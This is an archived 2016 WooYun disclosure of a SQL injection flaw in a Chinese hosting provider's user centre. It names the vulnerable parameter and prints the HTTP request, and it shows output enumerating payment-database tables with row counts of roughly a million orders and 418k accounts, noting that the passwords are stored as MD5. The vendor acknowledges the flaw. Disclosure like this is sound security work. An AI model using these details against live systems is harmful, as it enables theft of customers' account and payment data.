乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-15: 细节已通知厂商并且等待厂商处理中 2016-04-15: 厂商已经确认,细节仅向厂商公开 2016-04-25: 细节向核心白帽子及相关领域专家公开 2016-05-05: 细节向普通白帽子公开 2016-05-15: 细节向实习白帽子公开 2016-05-30: 细节向公众公开
https://uc.qycn.com/login.php
注入参数:an_status
GET https://uc.qycn.com/announcement.php?an_status=1&act=search&an_publish_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%8F%91%E5%B8%83%E6%97%A5%E6%9C%9F&an_end_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E7%BB%93%E6%9D%9F%E6%97%A5%E6%9C%9F&keyword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&type=list&submit=%E6%90%9C+%E7%B4%A2 HTTP/1.1Host: uc.qycn.comConnection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36Referer: https://uc.qycn.com/announcement.php?act=listAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8
dbs:
百万订单:
Database: newqycn_pay+-------------------------+---------+| Table | Entries |+-------------------------+---------+| qy_order | 996877 || qy_business | 471212 || qy_order_buydetail | 437606 || qy_useraccount | 418035 || qy_order_serviceparams | 309086 || qy_order_service | 300540 || qy_account_log | 177322 || qy_order_sms | 133378 || qy_order_regdomain | 93107 || qy_pay_logs | 83300 || qy_order_domain | 76166 || qy_order_payment | 35233 || qy_order_dns | 19719 || qy_yeepay_log | 8797 || qy_paypricelog | 3020 || qy_payment_statis | 1544 || qy_order_transfer | 799 || qy_order_servicegift | 438 || qy_order_receipt | 365 || qy_manual_pay | 317 || qy_order_device | 178 || qy_order_address | 176 || qy_order_voice | 137 || qy_order_auth | 98 || qy_order_safe | 95 || qy_orderinfo | 63 || qy_order_jk | 61 || qy_safe_info | 15 || qy_order_payment_client | 9 || qy_safe_checkinfo | 7 |+-------------------------+---------+
百万用户记录:
可脱裤,密码为md5加密:
危害等级:高
漏洞Rank:15
确认时间:2016-04-15 14:13
谢谢支持,我们马上安排跟进!
暂无